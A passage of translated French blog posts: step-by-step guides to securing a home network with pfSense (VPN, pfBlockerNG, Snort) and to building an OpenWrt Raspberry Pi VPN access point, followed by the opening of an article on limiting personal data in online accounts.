VPN ne sont pas une sorte de magie qui vous rendra sécurisé ou quoi que ce soit. Ce qu\u0026rsquo;ils font principalement est :\nPlutôt que votre FAI, une autre entreprise voit votre trafic Internet. C\u0026rsquo;est une bonne chose si vous faites davantage confiance à votre fournisseur VPN qu\u0026rsquo;à votre FAI (de plus, il peut être plus difficile pour votre fournisseur VPN de lier votre trafic à une identité réelle) Plusieurs personnes utiliseront la même adresse IP que vous, il sera donc plus difficile pour les sites web et autres de vous suivre. Cela masque également votre véritable localisation géographique (qui peut être connue dans une certaine mesure avec votre vraie adresse IP) Configuration de base # La configuration initiale est assez simple. Vous devez d\u0026rsquo;abord télécharger l\u0026rsquo;image depuis le site web de pfSense (j\u0026rsquo;ai utilisé AMD64/DVD Image ISO Installer), flasher l\u0026rsquo;ISO sur une clé USB, et démarrer votre machine avec après avoir branché le port WAN à votre Internet, et le port LAN à votre ordinateur (vous aurez également besoin de brancher la machine à un écran/clavier, ou d\u0026rsquo;utiliser le port COM).\nLe processus d\u0026rsquo;installation vous posera diverses questions assez standard. Si vous utilisez une machine Protectli, vous voudrez choisir UEFI dans la configuration de démarrage. Une fois l\u0026rsquo;installation terminée, vous pouvez vous connecter à l\u0026rsquo;interface d\u0026rsquo;administration via votre navigateur à l\u0026rsquo;adresse https://192.168.1.1, et vous connecter avec le nom d\u0026rsquo;utilisateur admin et le mot de passe pfsense.\nDe là, vous passerez par un écran de configuration vous demandant à nouveau diverses choses standard. J\u0026rsquo;ai décoché l\u0026rsquo;option Override DNS et je n\u0026rsquo;ai pas rempli les serveurs DNS, car nous utiliserons un résolveur local.\nEnsuite, vous pouvez débrancher votre ordinateur du port LAN de l\u0026rsquo;appareil, brancher votre point d\u0026rsquo;accès à la place, et vous connecter via WiFi. Notez que si vous souhaitez vous connecter en SSH à votre pare-feu, vous devrez l\u0026rsquo;autoriser depuis le menu System/Advanced/Secure Shell Menu.\nAvant de continuer, faisons une petite amélioration : vous avez peut-être remarqué que le tableau de bord n\u0026rsquo;a que deux colonnes disponibles pour organiser les widgets ; une grande partie de votre écran est donc probablement inutilisée. Allons dans System/General Setup, et changeons la valeur de Dashboard Columns à 3 pour ne pas gaspiller cet espace. Ensuite, vous pouvez configurer le tableau de bord comme vous le souhaitez avec de nouveaux widgets (en utilisant le + en haut à droite de la page du tableau de bord).\nConfiguration spécifique à Protectli # Si vous utilisez un appareil Protectli, le fabricant conseille d\u0026rsquo;effectuer quelques modifications dans la configuration pour mieux tirer parti du matériel (comme détaillé sur cette page).\nDans System/Advanced/Miscellaneous :\nDans Power Savings, cochez Enable PowerD, et mettez les trois champs suivants en Hiadaptive -\u0026gt; cela vous permettra d\u0026rsquo;utiliser le widget Thermal Sensors dans le tableau de bord, et de voir la température par cœur de CPU Définissez le Cryptographic Hardware comme AES-NI and BSD Crypto Device (aesni, cryptodev) Définissez les Thermal Sensors comme Intel Core* CPI on-die thermal sensor Notez que vous verrez probablement votre CPU quelque part entre 50 et 60 degrés Celsius lors de l\u0026rsquo;utilisation de la machine. C\u0026rsquo;est normal et tout à fait acceptable.\nRésolveur DNS # Nous voulons utiliser notre machine comme résolveur DNS plutôt que d\u0026rsquo;utiliser un DNS sur Internet. Allez dans le menu Services/DNS Resolver, et assurez-vous d\u0026rsquo;avoir les éléments suivants dans les General Settings :\nEnable DNS Resolver coché Network Interfaces -\u0026gt; All Outgoing Network Interfaces -\u0026gt; All (notez que nous changerons cela lorsque le VPN sera configuré, afin que toutes vos requêtes VPN passent par celui-ci) Struct Outgoing Network Interface Binding décoché Enable DNSSEC Support coché Enable Python Module coché Enable Forwarding Mode décoché Nous nous assurerons également que Query Name Minimization est coché dans les Advanced Settings.\nÀ ce stade, nous avons un réseau fonctionnel utilisant notre propre VPN, et tous les clients connectés à votre point d\u0026rsquo;accès l\u0026rsquo;utiliseront par défaut.\nUne note rapide sur le DNS # Avec les paramètres précédents, nous avons notre propre résolveur DNS. Cela signifie que si vous essayez de vous connecter à maps.google.com, le résolveur va :\nContacter le DNS racine pour demander où trouver le DNS en charge du TLD dot com Contacter le DNS en charge du TLD dot com, et lui demander où trouver google Contacter google, et demander où trouver maps Notez que comme Query Name Minimization est activé, le résolveur enverra des requêtes sans inclure d\u0026rsquo;informations superflues. Par exemple, lors du contact avec le DNS racine, il demandera où se trouve le TLD en charge du dot com, mais ne transmettra pas l\u0026rsquo;intégralité de maps.google.com qu\u0026rsquo;il cherche à résoudre. De même, lorsqu\u0026rsquo;il interroge le TLD en charge de la zone dot com, il demandera google.com et non maps.google.com. Utiliser le résolveur de cette manière signifie que les requêtes DNS seront faites en clair sur le port 53.\nSi vous préférez que le résolveur ne demande qu\u0026rsquo;à un serveur DNS le résultat (de manière chiffrée), vous pouvez faire ce qui suit :\nDans Services/DNS Resolver/General Settings, cochez Enable Forwarding Mode et Use SSL/TLS for outgoing DNS Queries to Forwarding Servers Dans System/General Setup, renseignez un serveur DNS de votre choix (de préférence un qui prend en charge le DNS over TLS), par exemple Quad9 ou Cloudflare Toujours dans le General Setup, définissez le DNS Resolution Behavior pour n\u0026rsquo;utiliser que le DNS local et ignorer les DNS distants (sinon, vous serez potentiellement sujet à des fuites DNS lors de l\u0026rsquo;utilisation d\u0026rsquo;un VPN) Les deux méthodes ont leurs avantages et inconvénients, et je n\u0026rsquo;ai pas d\u0026rsquo;avis tranché sur laquelle est la meilleure.\nBaux DHCP statiques # Si vous souhaitez que toutes vos machines utilisent un VPN pour se connecter à Internet et utiliser pfBlockerNG, vous pouvez ignorer cette étape. En gros, nous voulons nous assurer que les machines connectées au réseau auront toujours la même adresse IP afin de pouvoir configurer des règles spécifiques pour elles (c\u0026rsquo;est-à-dire que vous n\u0026rsquo;avez pas besoin de le faire pour les machines pour lesquelles vous ne voulez pas définir de règles spéciales).\nD\u0026rsquo;abord, vous devrez aller dans le menu Services/DHCP Server. Si vous avez utilisé la configuration par défaut, vous avez probablement quelque chose comme ceci :\nDefault DHCP Ranges Nous allons modifier la plage pour que les IP attribuées par DHCP soient de 192.168.1.100 à 192.168.1.245. Cela nous permettra d\u0026rsquo;attribuer manuellement une IP entre 192.168.1.2 et 192.168.1.99 à nos machines.\nEnsuite, en bas de la page, nous ajouterons une entrée dans DHCP Static Mapping for this Interface. Notez que si vos machines sont déjà connectées au réseau, vous pouvez aller dans Status/DHCP Leases, et cliquer sur Add Static Mapping pour les entrées concernées, afin de ne pas avoir à taper l\u0026rsquo;adresse MAC et le nom d\u0026rsquo;hôte vous-même. Vous voudrez alors configurer les choses comme montré dans la capture d\u0026rsquo;écran suivante. Notez que parfois, l\u0026rsquo;interface remplira automatiquement le nom d\u0026rsquo;hôte avec une adresse IP (principalement quand elle ne connaît pas le nom d\u0026rsquo;hôte). Cela rendra pfSense mécontent, donc vous ne voudrez pas faire cela.\nStatic Mapping Configuration pfBlockerNG # Tout le monde déteste les publicités et le tracking. Faisons quelque chose à ce sujet également. pfBlockerNG est un module qui peut être installé dans pfSense, et qui permet de faire la même chose qu\u0026rsquo;un PiHole (ne pas résoudre les requêtes DNS de domaines connus de trackers/publicités, plus pas mal d\u0026rsquo;autres choses).\nPour l\u0026rsquo;installer, nous irons dans System/Package Manager/Available Packages, rechercherons pfBlockerNG-devel, puis cliquerons sur installer. Notez qu\u0026rsquo;il existe aussi une version pfBlockerNG, mais la version devel nous donnera plus de fonctionnalités.\nLa configuration peut maintenant être effectuée dans Firewall/pfBlockerNG.\nMenu General # Dans les paramètres généraux, nous cocherons la case Enable pour pfBlockerNG, et laisserons les autres paramètres par défaut. Notez que les Log Settings vous permettent de définir combien d\u0026rsquo;historique de requêtes vous souhaitez conserver.\nMenu IP # Ce menu peut être utilisé pour diverses choses comme empêcher la connexion avec des adresses IP signalées comme suspectes ou identifiées dans une certaine zone géographique, mais nous n\u0026rsquo;examinerons pas cela aujourd\u0026rsquo;hui.\nSi vous souhaitez avoir des statistiques sur la localisation des IP résolues par le serveur DNS, vous pouvez obtenir une clé de licence MaxMind gratuite pour utiliser GeoIP, et la renseigner dans le menu approprié.\nMenu DNSBL et Feeds # C\u0026rsquo;est la fonctionnalité que nous utiliserons pour activer la liste de blocage DNS. Vous devez avoir la configuration suivante :\nEnable DNSBL coché DNSBL Mode -\u0026gt; Unbound python mode, ce qui permettra de meilleures performances et plus de fonctionnalités (comme exclure des IP spécifiques du blocage DNS) DNS Reply Logging coché si vous souhaitez avoir des statistiques sur les noms de domaine résolus (bon à activer de temps en temps pour faire un audit de ce qui se passe avec vos machines) DNSBL Blocking coché HSTS Mode coché Python Group Policy activé, si vous ne souhaitez pas utiliser le filtrage DNS pour certaines de vos machines Si vous avez coché la case Python Group Policy, un menu du même nom avec un champ texte sera présent sur cette page. Vous pouvez ajouter une IP par ligne, et ces IP n\u0026rsquo;utiliseront pas DNSBL.\nRemarquez également la section DNSBL Whitelist qui vous permettra d\u0026rsquo;ajouter des domaines que vous ne voulez pas voir bloqués.\nGroupes DNSBL # Dans ce sous-menu, nous pouvons configurer des groupes de listes, et la fréquence à laquelle vous souhaitez qu\u0026rsquo;elles soient rafraîchies. Par exemple, si nous configurons DNSBL pour utiliser l\u0026rsquo;EasyList, qui est assez populaire auprès des bloqueurs de publicités, vous devriez avoir quelque chose comme suit.\nDNSBL Group for EasyList Notez que vous pouvez changer le mode Logging/Blocking pour ne pas garder trace des domaines bloqués. Vous pouvez aussi définir la fréquence de mise à jour des listes.\nSi vous souhaitez créer un groupe et ajouter des éléments manuellement, vous pouvez le faire en utilisant la DNSBL Custom_List qui vous permet de lister des noms de domaine.\nJe n\u0026rsquo;ai aucun intérêt à censurer quoi que ce soit de mon réseau, mais si vous souhaitez le faire, vous pouvez utiliser les sous-menus DNSBL Category et DNSBL SafeSearch pour bloquer des choses par catégorie (par exemple pornographie, drogues, banque, hacking, jardinage\u0026hellip; il y a un assez grand choix de filtres\u0026hellip;)\nFeeds # Ajouter des groupes et des listes de blocage à la main c\u0026rsquo;est bien, mais pas très amusant. Heureusement, pfBlockerNG est livré avec un ensemble de listes que vous pouvez activer depuis le menu Feeds. Vous n\u0026rsquo;avez qu\u0026rsquo;à cliquer sur l\u0026rsquo;icône + des éléments qui vous intéressent, et le logiciel pré-remplira le formulaire des groupes DNSBL pour vous.\nRapports # Maintenant que nous avons terminé la configuration, il est temps de voir quelques résultats. Avant cela (si c\u0026rsquo;est la première fois que vous utilisez le module), assurez-vous d\u0026rsquo;aller dans le menu Update et de forcer un rechargement pour avoir toutes les listes actives.\nÉtant donné que vous avez autorisé la journalisation, vous pouvez utiliser les sous-menus suivants :\nUnified pour voir toute l\u0026rsquo;activité liée au blocage IP et DNSBL Alerts pour voir les listes d\u0026rsquo;éléments bloqués DNS Reply pour voir les requêtes DNS effectuées DNS Reply Stats pour voir quelques graphiques sur votre activité DNS DNSBL Block Stats pour en savoir plus sur les requêtes DNS bloquées Notez que la profondeur de l\u0026rsquo;historique visible dépend du nombre de lignes que vous autorisez les journaux à stocker.\nConfiguration VPN # Maintenant, configurons pfSense pour que toutes les connexions à Internet passent par un VPN. Je n\u0026rsquo;entrerai pas dans les détails de la configuration d\u0026rsquo;une instance de client OpenVPN car elle sera légèrement différente selon le fournisseur que vous utilisez. J\u0026rsquo;ai mis des liens vers les guides pour Mullvad, ProtonVPN et PIA dans les références de cet article. Puisque nous utiliserons notre propre DNS, faites attention à ne pas configurer de DNS avec la connexion OpenVPN (ne cochez pas l\u0026rsquo;option Pull DNS).\nUne fois votre client configuré et fonctionnant correctement, nous irons dans Interfaces/Interface Assignments et ajouterons une interface pour le client. Nous allons ensuite dans sa page de configuration, la nommons VPN1 (ou ce qui vous plaît), et cochons la case Block bogon network.\nEnsuite, nous allons dans Firewall/NAT/Outbound, sélectionnons le mode Manual Outbound NAT rule generation, et sauvegardons. De nouveaux mappings devraient apparaître. Nous allons modifier les deux dernières règles (qui devraient ressembler à la capture d\u0026rsquo;écran suivante)\nOriginal NAT Rules to Change pour qu\u0026rsquo;elles ressemblent à ce qui suit (il suffit de changer l\u0026rsquo;interface de WAN à VPN1, et de désactiver les règles IPv6)\nNAT rules after the changes Ensuite, dans Firewall/Rules/LAN, nous nous assurons de désactiver les règles IP v6 (icône sur la droite) et de modifier la règle Default allow LAN to any rule pour utiliser notre interface VPN1 comme passerelle.\nFirewall LAN rule after the change Enfin, nous voulons nous assurer que notre DNS local envoie ses requêtes à travers la connexion VPN. Allez dans Services/DNS Resolver, et changez les Outgoing Network Interfaces pour que seul VPN1 soit sélectionné.\nRedémarrez le client OpenVPN, et vous devriez pouvoir confirmer que vous avez la bonne adresse IP. Vous pouvez également faire un test de fuite DNS pour confirmer que le DNS ne fuit pas (c\u0026rsquo;est-à-dire que vous ne devriez voir que l\u0026rsquo;IP de votre VPN dans les résultats).\nExclure un appareil spécifique du VPN # Si pour une raison quelconque vous souhaitez qu\u0026rsquo;un appareil se connecte directement à Internet, nous pouvons le permettre en configurant quelques règles. D\u0026rsquo;abord, nous devons effectuer une configuration dans Firewall/NAT/Outbound. Nous allons en fait copier les règles que nous avons modifiées précédemment, mais cette fois mettre (à nouveau) WAN comme interface. Au final, vous devriez avoir les règles suivantes.\nFinal Outgoing NAT Rules Ensuite, pour chaque appareil que vous souhaitez utiliser sans VPN, nous ajouterons une règle de pare-feu dans Firewall/Rules/LAN (vous devez utiliser Add rule to the top of the list, sinon cela ne fonctionnera pas). Vous devez modifier les champs suivants lors de la création d\u0026rsquo;une nouvelle règle :\nSource (Single host or alias) -\u0026gt; L\u0026rsquo;IP de l\u0026rsquo;appareil (que vous avez configurée en statique via DHCP précédemment) Description -\u0026gt; Un mémo pour vous Gateway -\u0026gt; l\u0026rsquo;interface WAN Snort # Enfin, ajoutons de la surveillance de sécurité à notre réseau et allons dans System/Package Manager/Available Packages, et installons snort (un système open source de détection et de prévention d\u0026rsquo;intrusions réseau). Ensuite, un nouveau menu Services/Snort apparaîtra. Nous effectuerons la configuration suivante :\nDans Global Settings, activez les règles qui vous intéressent, et définissez l\u0026rsquo;intervalle de mise à jour à 6 heures Dans Updates, cliquez sur Update Rules, et vérifiez que tout est correctement téléchargé Une fois cela fait, créons quelques interfaces Snort. Une pour LAN, et une pour WAN. Nous effectuons la configuration suivante :\nActiver les interfaces Cocher Enable Packet Captures pour pouvoir voir plus de contexte lors de l\u0026rsquo;investigation d\u0026rsquo;une alerte Il y a aussi une option pour Block Offenders déclenchant une alerte. Si vous configurez un pare-feu domestique, je vous conseille de ne pas cocher cette option car vous finirez probablement par obtenir un bon nombre de faux positifs, et des machines seront bloquées sans bonne raison.\nAvec cela, nous avons un Snort fonctionnel, et nous pouvons ajouter un widget au tableau de bord pour voir les dernières alertes. Je n\u0026rsquo;entrerai pas dans les détails de Snort maintenant, car je prévois d\u0026rsquo;écrire un article à ce sujet plus tard. Je mettrai le lien de l\u0026rsquo;article ici quand il sera en ligne.\nSauvegardez votre configuration # Maintenant que nous avons tout configuré, exportons un fichier de sauvegarde afin de pouvoir tout restaurer en cas de problème. Cela se fait dans le menu Diagnostics/Backup \u0026amp; Restore.\nPour aller plus loin # Si vous souhaitez en savoir plus sur les possibilités offertes par PfSense, vous pourriez être intéressé par cet article où j\u0026rsquo;explique comment exiger une connexion WireGuard pour accéder à vos services auto-hébergés en ligne, et comment configurer PfSense pour se connecter à WireGuard et router le trafic nécessaire.\nAussi, j\u0026rsquo;ai récemment écrit un nouvel article avec des améliorations que j\u0026rsquo;ai trouvées pour cette configuration (Home Network and pfSense Improvements). Cela pourrait vous intéresser si vous voulez que pfSense soit plus résistant aux coupures Internet en cas de défaillance du VPN, ou si vous souhaitez faciliter le basculement des machines entre l\u0026rsquo;utilisation et la non-utilisation du VPN.\nRéférences et crédits # Références # ProtonVPN pfSense configuration Guide Using pfSense with Mullvad pfSense 2.4.5 (OpenVPN Setup) (PIA) pfSense® CE Configuration Recommendations (Protectli) Cisco Umbrella DNS and QNAME Minimization Crédits # Photo de couverture par Jordan Harrison sur Unsplash ","date":"2022-06-10","externalUrl":null,"permalink":"/fr/posts/2022/protect-your-home-network-with-pfsense-simple-walk-through/","section":"Articles","summary":"Voyons comment configurer un réseau domestique sécurisé avec pfSense en utilisant un VPN, pfBlockerNG (équivalent de pi-hole) et Snort","title":"Protégez votre réseau domestique avec pfSense - Un guide simple","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nJe me suis récemment retrouvé dans une situation où je voulais avoir un petit point d\u0026rsquo;accès WiFi me permettant de router tout le trafic Internet à travers un VPN avec un kill-switch, et des performances correctes. Comme j\u0026rsquo;avais un Raspberry Pi inutilisé, j\u0026rsquo;ai décidé de l\u0026rsquo;utiliser avec OpenWrt pour atteindre mon objectif. Dans cet article, je documenterai la procédure pour avoir tout correctement configuré. Les instructions sont valables pour OpenWrt 21.02.3.\nFaire fonctionner OpenWRT # La première étape consiste à flasher OpenWRT sur une carte microSD. Raspberry dispose d\u0026rsquo;un logiciel pour le faire, mais vous pouvez aussi utiliser dd, ou n\u0026rsquo;importe quel logiciel avec lequel vous êtes à l\u0026rsquo;aise. L\u0026rsquo;image peut être trouvée sur le site web d\u0026rsquo;OpenWrt.\nUne fois cela fait, vous pouvez brancher votre Raspberry Pi et votre ordinateur sur un switch, et démarrer la machine. Vous pourrez alors accéder à l\u0026rsquo;interface LuCI à 192.168.1.1 et vous connecter en tant que root sans mot de passe.\nNotez que par défaut, votre carte microSD ne sera formatée qu\u0026rsquo;avec des partitions de quelques centaines de Mo, donc à un moment donné, vous voudrez peut-être reformater vos partitions si vous voulez faire un usage avancé d\u0026rsquo;OpenWrt. Les différentes instructions sur Internet n\u0026rsquo;ont pas fonctionné pour moi, et je n\u0026rsquo;avais ni le temps ni le besoin d\u0026rsquo;investiguer davantage, mais je laisserai des références à la fin de l\u0026rsquo;article.\nUne fois que nous avons accès à l\u0026rsquo;interface d\u0026rsquo;administration, nous voulons d\u0026rsquo;abord aller dans System/Administration et définir un mot de passe correct. Je recommande également de modifier les paramètres SSH pour n\u0026rsquo;autoriser la connexion qu\u0026rsquo;avec une clé SSH.\nConfiguration réseau de base # Maintenant qu\u0026rsquo;OpenWrt est opérationnel, nous voulons activer le WiFi et faire une configuration réseau de base.\nDans Network/Wireless, éditez l\u0026rsquo;interface réseau sans fil :\nVous pouvez choisir la fréquence qui convient le mieux à vos besoins. J\u0026rsquo;ai utilisé le mode N avec une bande 5 GHz et un canal automatique. Si vous voulez régler les choses manuellement, vous pouvez utiliser l\u0026rsquo;Channel Analysis dans le menu Status Mode : Access Point Réseau : lan Chiffrement : tout ce qui est WPA2 ou WPA3, chiffrement auto, et une clé forte Dans les paramètres avancés, il y a aussi une option pour empêcher les communications entre clients Ensuite, activez l\u0026rsquo;interface, et vous devriez voir votre réseau WiFi. Vous remarquerez peut-être que vous pouvez ajouter un point d\u0026rsquo;accès WiFi supplémentaire dans la configuration radio0. Le faire ne fera que rendre OpenWRT mécontent, et vos modifications seront automatiquement annulées.\nLa dernière étape avant de pouvoir utiliser le WiFi est de configurer les interfaces dans Network/Interfaces. Par défaut, vous devriez avoir une seule interface br-lan, ou quelque chose du genre. Nous allons éditer cette interface pour avoir les paramètres suivants :\nProtocole : Static address Appareil wlan0 Bring up boot coché Adresse IPV4 192.168.1.1 Masque de sous-réseau : 255.255.255.0 Zone pare-feu : lan Assurez-vous que le service DHCP n\u0026rsquo;est pas désactivé Ensuite, nous ajouterons une interface pour eth0 avec les paramètres suivants :\nProtocole DHCP Client Appareil eth0 Bring up on boot activé Zone pare-feu : wan Quand tout cela est fait, la dernière étape avant de pouvoir utiliser le WiFi pour accéder à Internet est de vérifier les paramètres du pare-feu dans Network/Firewall. Vous devriez avoir deux zones :\nlan =\u0026gt; wan devrait avoir lan comme Covered networks, autoriser le transfert vers la destination wan, et avoir Input, Output et Forward en accepté wan =\u0026gt; DROP devrait avoir eth0 comme Covered networks, drop pour Input et Forward, et accept pour Output Vous pouvez maintenant cliquer sur Save \u0026amp; Apply et vous connecter à votre WiFi.\nConfiguration du VPN # Configuration de base # Dans la dernière étape de ce guide, nous utiliserons ProtonVPN avec OpenVPN, mais vous pouvez utiliser pratiquement n\u0026rsquo;importe quel fournisseur, et d\u0026rsquo;autres protocoles comme WireGuard sont également utilisables.\nD\u0026rsquo;abord, nous devons installer quelques paquets. Allez dans System/Software, mettez à jour les listes si rien n\u0026rsquo;apparaît dans les paquets disponibles, et installez openvpn-openssl et luci-app-openvpn. Rafraîchissez votre interface, et vous devriez voir un menu VPN/OpenVPN.\nNous utiliserons ensuite l\u0026rsquo;OVPN configuration file upload, et lui donnerons le fichier de configuration fourni par ProtonVPN. La configuration apparaîtra alors dans la liste des instances OpenVPN, et nous l\u0026rsquo;éditerons. Vous devriez ajouter le chemin du fichier auth-user-pass dans le champ texte du haut, et mettre votre nom d\u0026rsquo;utilisateur/mot de passe dans le second.\nÉdition de la configuration OpenVPN sur OpenWrt Une fois cela fait, vous pouvez retourner à la liste des instances, cocher la case Enabled, et Save \u0026amp; Apply. À ce stade, l\u0026rsquo;écran devrait montrer le VPN comme démarré.\nEnsuite, nous configurerons une nouvelle interface pour le VPN. Dans Network/Interface, ajoutez une nouvelle interface tun0, avec le protocole Unmanaged, Bring up on boot, et tun0 comme appareil. Dans Firewall Settings, créez une zone pare-feu VPN. Nous configurerons ensuite cette zone dans Network/Firewall avec les mêmes paramètres que wan =\u0026gt; DROP, avec la différence que nous utiliserons lan dans Allow forward from source zones, et accept pour le Forward. Nous irons aussi dans la zone lan =\u0026gt; VPN et ajouterons la zone VPN dans Allow Forward. Vous devriez maintenant avoir le résultat suivant :\nInterfaces réseau après la configuration VPN Écran des zones après la configuration VPN dans Network/Firewall Maintenant, la connexion passera par le VPN s\u0026rsquo;il est actif, mais pourra toujours atteindre Internet si le VPN est hors service. Une dernière chose que nous voulons faire pour éviter les fuites DNS est d\u0026rsquo;utiliser des serveurs DNS personnalisés avec l\u0026rsquo;interface eth0, et de désactiver l\u0026rsquo;option Use DNS servers advertised by peer.\nKill Switch # Si vous voulez configurer un \u0026ldquo;kill switch\u0026rdquo; pour le VPN (c\u0026rsquo;est-à-dire arrêter de permettre au trafic Internet de passer si le VPN est hors service), vous pouvez le faire facilement en modifiant la zone lan =\u0026gt; VPN dans la configuration du pare-feu. Il suffit de retirer lan des Allow forward to destination zones.\nSi vous avez plusieurs réseaux WiFi chez vous, vous devez configurer vos machines pour qu\u0026rsquo;elles ne se connectent automatiquement qu\u0026rsquo;à votre réseau OpenWrt. Sinon, elles pourraient se connecter à un autre WiFi, et vous vous connecterez à Internet sans VPN.\nDésactiver le VPN pour un appareil # Si vous n\u0026rsquo;utilisez pas le kill-switch et que vous voulez qu\u0026rsquo;un appareil se connecte à Internet sans utiliser le VPN, vous pouvez installer le paquet vpnbypass, configurer votre appareil pour avoir un bail DHCP statique dans la page d\u0026rsquo;accueil d\u0026rsquo;OpenWRT, et ajouter une Local IP Address to Bypass dans VPN/VPN Bypass.\nPour aller plus loin # Vous avez maintenant un routeur permettant à tous les appareils connectés d\u0026rsquo;accéder à Internet via VPN, mais il y a encore des choses que vous pouvez améliorer dans la configuration. Par exemple :\nIl y a un paquet snort que vous pourriez installer pour améliorer la sécurité de votre réseau Vous pourriez connecter un point d\u0026rsquo;accès WiFi externe, et faire en sorte que les appareils connectés à ce point d\u0026rsquo;accès puissent accéder à Internet sans VPN, par exemple si vous voulez utiliser Netflix (je suis sûr que vous pouvez faire cela avec un seul point d\u0026rsquo;accès en jouant avec les règles du pare-feu, mais personnellement je préfère la simplicité) Installer un paquet adblock et le configurer pour que tous les appareils connectés puissent aussi bénéficier de l\u0026rsquo;absence de publicités (par exemple, si vous avez des appareils iOS, il n\u0026rsquo;est pas possible d\u0026rsquo;installer des extensions adblock dans le navigateur) Références et crédits # Références # OpenWrt routers and Mullvad VPN (Proton VPN) How to set up ProtonVPN on OpenWRT routers (Mullvad VPN) OpenVPN client using LuCI (OpenWrt) OpenWrt on x86 hardware (PC / VM / server) (OpenWrt) Ressources pour le changement de partitions # https://forum.openwrt.org/t/expanding-openwrt-squashfs-image-sdcard/60606/7 https://forum.openwrt.org/t/how-to-expand-the-space-of-overlay/74093 https://openwrt.org/docs/guide-user/additional-software/extroot_configuration https://java-in-cloud.blogspot.com/2016/08/openwrt-extroot-and-multiple.html https://moreless.medium.com/extend-partition-and-file-system-on-raspberr-a48af9e90858 https://linuxconfig.org/how-to-extend-lede-openwrt-system-storage-with-an-usb-device https://linuxconfig.org/how-to-create-loop-devices-on-linux Crédits # Photo de couverture par Jainath Ponnala sur Unsplash ","date":"2022-05-07","externalUrl":null,"permalink":"/fr/posts/2022/configure-a-raspberry-pi-as-a-secure-wifi-access-point-with-open-wrt/","section":"Articles","summary":"Cet article est un guide pas à pas montrant comment configurer un point d’accès WiFi utilisant un VPN avec un Raspberry Pi et OpenWRT","title":"Configurer un Raspberry Pi comme point d'accès WiFi sécurisé avec OpenWrt","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSelon des enquêtes réalisées par des entreprises de gestionnaires de mots de passe (NordPass, Dashline) en 2017 et 2020, l\u0026rsquo;utilisateur moyen d\u0026rsquo;Internet avait entre 100 et 150 comptes en ligne. C\u0026rsquo;est un nombre relativement important (pas vraiment une surprise puisque vous avez besoin d\u0026rsquo;un compte pour à peu près tout de nos jours) et beaucoup d\u0026rsquo;informations personnelles que nous enregistrons sur Internet\u0026hellip;\nSavez-vous de combien le nombre de violations de données a augmenté en 2021 par rapport à 2020 ? Selon l\u0026rsquo;ITRC, de 68 %, pour un total de 1 862 événements de compromission de données. Toujours selon l\u0026rsquo;ITRC, 2021 a vu 23 % de compromissions de données de plus que le record historique de 2017. Quand il s\u0026rsquo;agit de vos données, la question n\u0026rsquo;est pas de savoir si elles fuiteront, mais quand elles fuiteront.\nDans cet article, je proposerai quelques stratagèmes que vous pouvez utiliser pour essayer de garder vos données en sécurité, et quelques réflexions à avoir lorsque vous mettez des données personnelles en ligne.\nS\u0026rsquo;inscrire ou ne pas s\u0026rsquo;inscrire # La première question que vous devez vous poser lorsque vous créez un compte est simple : \u0026ldquo;Ai-je vraiment besoin de ce compte ?\u0026rdquo; Quelques éléments à considérer :\nPeut-être pouvez-vous obtenir ce que vous voulez sans le compte ; par exemple en appelant le restaurant pour réserver une table plutôt que de passer par le site web Peut-être que le compte n\u0026rsquo;apporte pas d\u0026rsquo;avantages tangibles ; bien sûr, si vous créez un compte et connectez votre humidificateur d\u0026rsquo;air à Internet, vous pourriez avoir un graphique de l\u0026rsquo;humidité dans votre appartement en fonction de l\u0026rsquo;heure. Et après ? Le compte est-il facile à supprimer ultérieurement, et l\u0026rsquo;entreprise est-elle connue pour de mauvaises pratiques de gestion des données ? Au final, il n\u0026rsquo;y a pas de bonne réponse, et vous devez réfléchir à ce qui vous importe avant de prendre une décision. Peut-être considérez-vous que la commodité de s\u0026rsquo;inscrire à un service compense les implications en matière de vie privée et la charge de gérer un compte supplémentaire, et c\u0026rsquo;est tout à fait acceptable.\nQuelles données renseigner # Si vous avez décidé que vous avez besoin de créer un compte, la question suivante est de savoir comment remplir les différentes données requises. À ce stade, vous voulez décider quelles sont les choses auxquelles vous voulez répondre honnêtement. Quelques exemples :\nSi vous créez un nouveau compte bancaire et fournissez de fausses informations, vous commettez probablement quelques délits qui peuvent avoir de mauvaises conséquences Si vous souscrivez une assurance, remplissez de fausses informations et avez un accident, ils pourraient être en mesure d\u0026rsquo;éviter de vous indemniser Si vous réservez un restaurant, votre nom et autres n\u0026rsquo;ont pas d\u0026rsquo;importance, mais si vous renseignez un mauvais numéro de téléphone et qu\u0026rsquo;ils essaient de vous appeler, vous pouvez dire adieu à votre réservation. De plus, les mauvais numéros de téléphone peuvent avoir pas mal de conséquences négatives avec les services qui permettent de réinitialiser les mots de passe par SMS Fondamentalement, ce que vous voulez vous demander est \u0026ldquo;Que va potentiellement faire le service avec cette information, et quelles sont les conséquences si je donne quelque chose de faux ?\u0026rdquo;, et à partir de là, choisir ce que vous voulez faire. De plus, ne donnez pas volontairement des informations quand ce n\u0026rsquo;est pas nécessaire. Si le site web permet de renseigner un numéro de téléphone mais ne le rend pas obligatoire, alors n\u0026rsquo;en donnez pas.\nSi vous allez remplir des données incorrectes, l\u0026rsquo;objectif est de ne pas attirer l\u0026rsquo;attention sur vous. Par exemple :\nNe remplissez pas votre nom comme \u0026ldquo;Jean Dupont\u0026rdquo; ou \u0026ldquo;Marie Martin\u0026rdquo;. Essayez de trouver quelque chose de courant, mais pas évidemment faux Si vous devez remplir une adresse physique que vous savez ne sera pas utilisée, utilisez une vraie adresse mais mettez un numéro d\u0026rsquo;appartement qui n\u0026rsquo;existe pas. Selon le cas d\u0026rsquo;usage, remplir n\u0026rsquo;importe quoi (ex. 00000 comme code postal) convient aussi. Enfin, soyez conscient que les données que vous renseignez peuvent permettre à quelqu\u0026rsquo;un de vous pister en faisant des relations entre vos différents comptes. Par exemple, en utilisant votre adresse e-mail. Pour éviter cela, voici quelques éléments à considérer et des stratégies que vous pouvez utiliser (la gestion des adresses e-mail, des identités et autres sont des sujets suffisamment vastes pour mériter un article dédié ; peut-être que je l\u0026rsquo;écrirai à l\u0026rsquo;avenir) :\nEssayez d\u0026rsquo;utiliser une adresse e-mail unique chaque fois que vous devez en donner une Il n\u0026rsquo;est pas réaliste de donner un numéro de téléphone différent à chaque fois, mais vous pourriez créer quelques numéros VoIP et faire des groupes. Par exemple, vous utilisez le numéro A pour les livraisons, le numéro B pour les choses importantes comme 